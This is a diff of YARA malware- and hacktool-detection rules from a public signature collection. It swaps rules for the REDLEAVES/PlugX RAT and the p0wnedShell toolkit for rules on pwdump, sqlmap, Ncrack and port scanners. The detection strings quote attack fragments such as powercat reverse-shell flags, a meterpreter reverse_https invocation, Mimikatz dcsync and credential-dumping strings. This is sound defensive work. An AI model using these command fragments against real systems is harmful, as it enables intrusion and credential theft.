+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L88-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51d8a0785bc25cf02460b9b7490ccba3d67806c953e6aa3d3882341ce11857fa"
-		score = 75
-		quality = 85
+		logic_hash = "0064950d88eccbe670cd1dc70861d093c7f49f8f10e984aef4cfb4bcc94e4645"
+		score = 50
+		quality = 83
 		tags = ""
-		true_positive = "5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx. "
 
 	strings:
-		$UniqueString = {2e 6c 6e 6b [0-14] 61 76 70 75 69 2e 65 78 65}
-		$PsuedoRandomStringGenerator = {b9 1a [0-6] f7 f9 46 80 c2 41 88 54 35 8b 83 fe 64}
+		$a = "Unable to uninstall the fgexec service"
+		$b = "Unable to set socket to sniff"
+		$c = "Failed to load SAM functions"
+		$d = "Dump system passwords"
+		$e = "Error opening sam hive or not valid file"
+		$f = "Couldn't find LSASS pid"
+		$g = "samdump.dll"
+		$h = "WPEPRO SEND PACKET"
+		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
+		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
+		$k = "arpspoof\\Debug"
+		$l = "Success: The log has been cleared"
+		$m = "clearlogs [\\\\computername"
+		$n = "DumpUsers 1."
+		$o = "dictionary attack with specified dictionary file"
+		$p = "by Objectif Securite"
+		$q = "objectif-securite"
+		$r = "Cannot query LSA Secret on remote host"
+		$s = "Cannot write to process memory on remote host"
+		$t = "Cannot start PWDumpX service on host"
+		$u = "usage: %s <system hive> <security hive>"
+		$v = "username:domainname:LMhash:NThash"
+		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
+		$x = "Impersonation Tokens Available"
+		$y = "failed to parse pwdump format string"
+		$z = "Dumping password"
 
 	condition:
-		any of them
+		1 of them
 }
-rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Implantloader_Starburn
+rule SIGNATURE_BASE_Fierce2
 {
 	meta:
-		description = "Detects the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT"
-		author = "USG"
-		id = "976f42b1-58c9-554b-97e6-130a657507e2"
-		date = "2024-04-17"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L23-L34"
+		description = "This signature detects the Fierce2 domain scanner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08a72151-48c2-513b-995f-be0d5acba7dd"
+		date = "2014-01-07"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L126-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ebfdaf363ac80bc9bace3056ff86efd9c1b246c6f60373a82df4a0db901a6e3"
-		score = 75
+		logic_hash = "05502827dd5d1903507fd1e176d518516a5c1965fb4e51ea26b1a05eb0dce3d2"
+		score = 60
 		quality = 85
 		tags = ""
-		true_positive = "7f8a867a8302fe58039a6db254d335ae"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$XOR_Loop = {32 0c 3a 83 c2 02 88 0e 83 fa 08 [4-14] 32 0c 3a 83 c2 02 88 0e 83 fa 10}
+		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
 
 	condition:
-		any of them
+		1 of them
 }
-rule SIGNATURE_BASE_REDLEAVES_Droppedfile_Obfuscatedshellcodeandrat_Handkerchief
+rule SIGNATURE_BASE_Ncrack
 {
 	meta:
-		description = "Detects obfuscated .dat file containing shellcode and core REDLEAVES RAT"
-		author = "USG"
-		id = "51a28529-1084-5f24-9369-6427e8d51d9d"
-		date = "2024-04-17"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L36-L47"
+		description = "This signature detects the Ncrack brute force tool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c1c56ee9-7f76-5440-b0e0-86e372c53340"
+		date = "2014-01-07"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L141-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f91bd1ddd6691a0a5b6ebc6a28d35bb5b2e6c00754f07e58ffb01e06ad590ae3"
-		score = 75
-		quality = 83
+		logic_hash = "a42bfaefb873a10821bcc06db109d8ab20daa8c8ac0b6cfb245d2ee339f318bb"
+		score = 60
+		quality = 85
 		tags = ""
-		true_positive = "fb0c714cd2ebdcc6f33817abe7813c36"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$RedleavesStringObfu = {73 64 65 5e 60 74 75 74 6c 6f 60 6d 5e 6d 64 60 77 64 72 5e 65 6d 6d 6c 60 68 6f 2f 65 6d 6d}
+		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
 
 	condition:
-		any of them
+		1 of them
 }
-rule SIGNATURE_BASE_REDLEAVES_Coreimplant_Uniquestrings : FILE
+rule SIGNATURE_BASE_Sqlmap
 {
 	meta:
-		description = "Strings identifying the core REDLEAVES RAT in its deobfuscated state"
-		author = "USG"
-		id = "fd4d4804-f7d9-549d-8f63-5f409d6180f9"
-		date = "2018-12-20"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L49-L64"
+		description = "This signature detects the SQLMap SQL injection tool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "55a72fe6-f82d-5d55-842f-5d7e1cfcc9fa"
+		date = "2014-01-07"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L156-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ce6ab0f4007f3ea3c31442cab702ad3579faa6835d5ee9b4c03516ce0499bf3e"
-		score = 75
-		quality = 81
-		tags = "FILE"
+		logic_hash = "9c248c856c3d91a282012489b53dc9e15569e1bb1a5c9f5e3c7938f7ce0c3157"
+		score = 60
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$unique2 = "RedLeavesSCMDSimulatorMutex" nocase wide ascii
-		$unique4 = "red_autumnal_leaves_dllmain.dll" wide ascii
-		$unique7 = "\\NamePipe_MoreWindows" wide ascii
+		$s1 = "except SqlmapBaseException, ex:"
 
 	condition:
-		not uint32( 0 ) == 0x66676572 and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_PLUGX_Redleaves
+rule SIGNATURE_BASE_HKTL_Portscanner_Simple_Jan14
 {
 	meta:
-		description = "Detects specific RedLeaves and PlugX binaries"
-		author = "US-CERT Code Analysis Team"
-		id = "ede8ad8f-31cf-5314-9777-bddd60e499f2"
-		date = "2017-03-04"
-		date = "2017-04-03"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L66-L93"
+		description = "Auto-generated rule on file PortScanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "3e8960ce-0428-51e1-b992-4fa09fee8520"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		old_rule_name = "PortScanner"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L171-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c52110eb18dcdb7a0d4b8c42f22368acdd1bce44a192abcd71a20bee2705475"
+		hash = "b381b9212282c0c650cb4b0323436c63"
+		logic_hash = "c69269b227d46b5b970cfc094b3154b0a533b439b8ed492a2059025bc96d17a0"
 		score = 75
 		quality = 85
 		tags = ""
-		incident = "10118538"
-		MD5_1 = "598FF82EA4FB52717ACAFB227C83D474"
-		MD5_2 = "7D10708A518B26CC8C3CBFBAA224E032"
-		MD5_3 = "AF406D35C77B1E0DF17F839E36BCE630"
-		MD5_4 = "6EB9E889B091A5647F6095DCD4DE7C83"
-		MD5_5 = "566291B277534B63EAFC938CDAAB8A399E41AF7D"
 
 	strings:
-		$s0 = { 80343057403D2FD0010072F433C08BFF80343024403D2FD0010072F4 }
-		$s1 = "C:\\Users\\user\\Desktop\\my_OK_2014\\bit9\\runsna\\Release\\runsna.pdb"
-		$s2 = "d:\\work\\plug4.0(shellcode)"
-		$s3 = "\\shellcode\\shellcode\\XSetting.h"
-		$s4 = { 42AFF4276A45AA58474D4C4BE03D5B395566BEBCBDEDE9972872C5C4C5498228 }
-		$s5 = { 8AD32AD002D180C23830140E413BCB7CEF6A006A006A00566A006A00 }
-		$s6 = { EB055F8BC7EB05E8F6FFFFFF558BEC81ECC8040000535657 }
-		$s7 = { 8A043233C932043983C10288043283F90A7CF242890D18AA00103BD37CE2891514AA00106A006A006A0056 }
-		$s8 = { 293537675A402A333557B05E04D09CB05EB3ADA4A4A40ED0B7DAB7935F5B5B08 }
-		$s9 = "RedLeavesCMDSimulatorMutex"
+		$s0 = "Scan Ports Every"
+		$s3 = "Scan All Possible Ports!"
 
 	condition:
-		$s0 or $s1 or $s2 and $s3 or $s4 or $s5 or $s6 or $s7 or $s8 or $s9
+		all of them
 }
-rule SIGNATURE_BASE_Korplug_FAST : FILE
+rule SIGNATURE_BASE_Domainscanv1_0
 {
 	meta:
-		description = "Rule to detect Korplug/PlugX FAST variant"
-		author = "Florian Roth (Nextron Systems)"
-		id = "85c6c460-2902-5bfa-be58-a2b62e3b882e"
-		date = "2015-08-20"
-		modified = "2023-12-05"
+		description = "Auto-generated rule on file DomainScanV1_0.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "94ead827-8b29-5cb5-82b6-a7ca5087bf7e"
+		date = "2025-04-14"
+		modified = "2025-04-14"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_korplug_fast.yar#L1-L27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L185-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
-		logic_hash = "31aeb634eecc0f93353432b0dde113bfb54810ea74b02f959447a1d42e7e9e1b"
+		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
+		logic_hash = "b06d902528fee5d1718d0a2984af3314e92e1ec7033c7596f9fb0e51a20eb848"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii
-		$a1 = "ShadowPlay" fullword ascii
-		$s1 = "%s\\rundll32.exe \"%s\"," fullword ascii
-		$s2 = "nvdisps.dll" fullword ascii
-		$s3 = "%snvdisps.dll" fullword ascii
-		$s4 = "\\winhlp32.exe" ascii
-		$s5 = "nvdisps_user.dat" fullword ascii
-		$s6 = "%snvdisps_user.dat" fullword ascii
+		$s0 = "dIJMuX$aO-EV"
+		$s1 = "XELUxP\"-\\"
+		$s2 = "KaR\"U'}-M,."
+		$s3 = "V.)\\ZDxpLSav"
+		$s4 = "Decompress error"
+		$s5 = "Can't load library"
+		$s6 = "Can't load function"
+		$s7 = "com0tl32:.d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $x1 or ( $a1 and 1 of ( $s* ) ) or 4 of ( $s* ) )
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedpowercat : FILE
+rule SIGNATURE_BASE_HKTL_Moorer_Port_Scanner
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "059a8e58-7b7e-582e-ba4a-80e4dffe9b5e"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L10-L29"
+		description = "Auto-generated rule on file MooreR Port Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "5d8fb83f-bed3-53d2-bd33-2158911dc7c8"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L204-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5882d0f91f237d2abe1149421db0e217e6dfcca70130d346a70d5c851eca085f"
+		hash = "376304acdd0b0251c8b19fea20bb6f5b"
+		logic_hash = "248f437964fc6f7836f6b4c87e1f35bb1bac25a1a484cdf1a4065e7efb823b51"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6a3ba991d3b5d127c4325bc194b3241dde5b3a5853b78b4df1bce7cbe87c0fdf"
+		tags = ""
 
 	strings:
-		$x1 = "Now if we point Firefox to http://127.0.0.1" fullword ascii
-		$x2 = "powercat -l -v -p" fullword ascii
-		$x3 = "P0wnedListener" fullword ascii
-		$x4 = "EncodedPayload.bat" fullword ascii
-		$x5 = "powercat -c " fullword ascii
-		$x6 = "Program.P0wnedPath()" ascii
-		$x7 = "Invoke-PowerShellTcpOneLine" fullword ascii
+		$s0 = "Description|"
+		$s3 = "soft Visual Studio\\VB9yp"
+		$s4 = "adj_fptan?4"
+		$s7 = "DOWS\\SyMem32\\/o"
 
 	condition:
-		( uint16( 0 ) == 0x7375 and filesize < 150KB and 1 of them ) or ( 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Hacktool_Strings_P0Wnedshell : FILE
+rule SIGNATURE_BASE_Netbios_Name_Scanner
 {
 	meta:
-		description = "Detects strings found in Runspace Post Exploitation Toolkit"
-		author = "Florian Roth"
-		id = "0846039d-1e00-5224-9560-55ab18034d54"
-		date = "2017-01-14"
-		modified = "2023-02-10"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L31-L62"
+		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "03716e00-a969-5ab5-9be7-e8fc4272e40f"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L219-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "faec8f0af877f1a80ff994e08c756728cea5f58000f7124c1a6e7e4c86e7f5c0"
+		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
+		logic_hash = "19b40a283b74317fece2f5be0ee3e38227d9631eebbc7efb0ea19056b52630f1"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
-		nodeepdive = 1
+		tags = ""
 
 	strings:
-		$x1 = "Invoke-TokenManipulation" fullword ascii
-		$x2 = "windows/meterpreter" fullword ascii
-		$x3 = "lsadump::dcsync" fullword ascii
-		$x4 = "p0wnedShellx86" fullword ascii
-		$x5 = "p0wnedShellx64" fullword ascii
-		$x6 = "Invoke_PsExec()" fullword ascii
-		$x7 = "Invoke-Mimikatz" fullword ascii
-		$x8 = "Invoke_Shellcode()" fullword ascii
-		$x9 = "Invoke-ReflectivePEInjection" ascii
-		$fp1 = "Sentinel Labs, Inc." wide
-		$fp2 = "Copyright Elasticsearch B.V." ascii wide
-		$fp3 = "Attack Information: Invoke-Mimikatz" ascii
-		$fp4 = "a30226 || INDICATOR-SHELLCODE Metasploit windows/meterpreter stage transfer attempt"
-		$fp5 = "use strict"
+		$s0 = "IconEx"
+		$s2 = "soft Visual Stu"
+		$s4 = "NBTScanner!y&"
 
 	condition:
-		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* )
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedpotato
+rule SIGNATURE_BASE_Felikspack3___Scanners_Ipscan
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2c2378e3-b948-5325-9afd-76424a7130b1"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L64-L81"
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "8360b268-3434-5142-9248-40b7a1589be9"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L233-L245"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d9107db6c6460429358a2f9f1f47d103e96811152e8d03517871ff0c66578d05"
+		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
+		logic_hash = "8da10a4536ecea889f29bb3f098518580629bf48eda88db7adfc5f61738ede25"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aff2b694a01b48ef96c82daf387b25845abbe01073b76316f1aab3142fdb235b"
 
 	strings:
-		$x1 = "Invoke-Tater" fullword ascii
-		$x2 = "P0wnedListener.Execute(WPAD_Proxy);" fullword ascii
-		$x3 = " -SpooferIP " ascii
-		$x4 = "TaterCommand()" ascii
-		$x5 = "FileName = \"cmd.exe\"," fullword ascii
+		$s2 = "WCAP;}ECTED"
+		$s4 = "NotSupported"
+		$s6 = "SCAN.VERSION{_"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedexploits
+rule SIGNATURE_BASE_Cgisscan_Cgiscan
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f754f5f-85e8-5b6f-bde2-566da4d39586"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L83-L97"
+		description = "Auto-generated rule on file CGIScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "60bd5038-a308-55fd-85bb-2c4183f1c951"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L247-L259"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "40f23316117faa63fa9e9a5d281600f8e9d41857aac815d22559391c74dec157"
+		hash = "338820e4e8e7c943074d5a5bc832458a"
+		logic_hash = "5bd856a77c53616cf78d093462f8b7ca5a5fb0924406a02941d86bdb015a1fbc"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "54548e7848e742566f5596d8f02eca1fd2cbfeae88648b01efb7bab014b9301b"
 
 	strings:
-		$x1 = "Pshell.RunPSCommand(Whoami);" fullword ascii
-		$x2 = "If succeeded this exploit should popup a System CMD Shell" fullword ascii
+		$s1 = "Wang Products" fullword wide
+		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
+		$s3 = "tcp is the only protocol supported thru socks server"
 
 	condition:
-		all of them
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_P0Wnedshellx64
+rule SIGNATURE_BASE_IP_Stealing_Utilities
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShellx64.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c9791804-4f08-5b7e-8d9d-37e2dfccec47"
-		date = "2017-01-14"
-		modified = "2021-09-15"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L99-L118"
+		description = "Auto-generated rule on file IP Stealing Utilities.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "3a947e9c-d707-5819-88f2-059585750048"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L261-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7cd33548ed3485cc6f3cd289813a8eb83b34e800b839c5c8f8add5f9e01a3da"
+		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
+		logic_hash = "38958edeee6e140e11267cdd7899ad517799dbce33ac267d51dea0f8aecfa1ee"
 		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "d8b4f5440627cf70fa0e0e19e0359b59e671885f8c1855517211ba331f48c449"
 
 	strings:
-		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9Pjgb/+kPPhv9Sjp01Wf" wide
-		$x2 = "Invoke-TokenManipulation" wide
-		$x3 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" fullword wide
-		$x4 = "CommandShell with Local Administrator privileges :)" fullword wide
-		$x5 = "Invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost " fullword wide
-		$fp1 = "AVSignature" ascii wide
+		$s0 = "DarkKnight"
+		$s9 = "IPStealerUtilities"
 
 	condition:
-		1 of ( $x* ) and not 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedlistenerconsole
+rule SIGNATURE_BASE_Superscan4
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedListenerConsole.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "77d13c34-3e15-5bc1-a100-f04be38cfb44"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L120-L140"
+		description = "Auto-generated rule on file SuperScan4.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "bd353382-ffa2-56c5-b842-1ffc94d6849e"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L274-L287"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "068e590f6f4f99c27814f2bf96d51e1c8c6422afcf8b99bb9f1852216335da7b"
+		hash = "78f76428ede30e555044b83c47bc86f0"
+		logic_hash = "7f76c59e85efac5c150f783606e2a9bdc8724c6afd9f9c6405d63f7467c72752"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d2d84e65fad966a8556696fdaab5dc8110fc058c9e9caa7ea78aa00921ae3169"
 
 	strings:
-		$x1 = "Invoke_ReflectivePEInjection" fullword wide
-		$x5 = "p0wnedShell> " fullword wide
-		$x6 = "Resources.Get_PassHashes" fullword wide
-		$s7 = "Invoke_CredentialsPhish" fullword wide
-		$s8 = "Invoke_Shellcode" fullword wide
-		$s9 = "Resources.Invoke_TokenManipulation" fullword wide
-		$s10 = "Resources.Port_Scan" fullword wide
-		$s20 = "Invoke_PowerUp" fullword wide
+		$s2 = " td class=\"summO1\">"
+		$s6 = "REM'EBAqRISE"
+		$s7 = "CorExitProcess'msc#e"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_P0Wnedbinaries
+rule SIGNATURE_BASE_Portracer
 {
 	meta:
-		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0c62dd3a-195c-5890-b262-2eb00c58f8c1"
-		date = "2017-01-14"
-		modified = "2023-12-05"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L142-L161"
+		description = "Auto-generated rule on file PortRacer.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		id = "54717938-2f4c-5442-b0ad-40b9acd1101a"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L288-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4df7fcf508a9257ea418bd1995158c3676037b310dc884d44658977fda81b13b"
+		hash = "2834a872a0a8da5b1be5db65dfdef388"
+		logic_hash = "f6ad85a8970b10e25becca76e17bff30cbc787ed45f331af4ecf9563ff11b65d"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fd7014625b58d00c6e54ad0e587c6dba5d50f8ca4b0f162d5af3357c2183c7a7"
 
 	strings:
-		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9" ascii
-		$x2 = "wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f" ascii
-		$x3 = "mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98" ascii
-		$x4 = "LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+" ascii
-		$x5 = "XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/" ascii
-		$x6 = "STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR" ascii
-		$x7 = "namespace p0wnedShell" fullword ascii
+		$s0 = "Auto Scroll BOTH Text Boxes"
+		$s4 = "Start/Stop Portscanning"
+		$s6 = "Auto Save LogFile by pressing STOP"
 
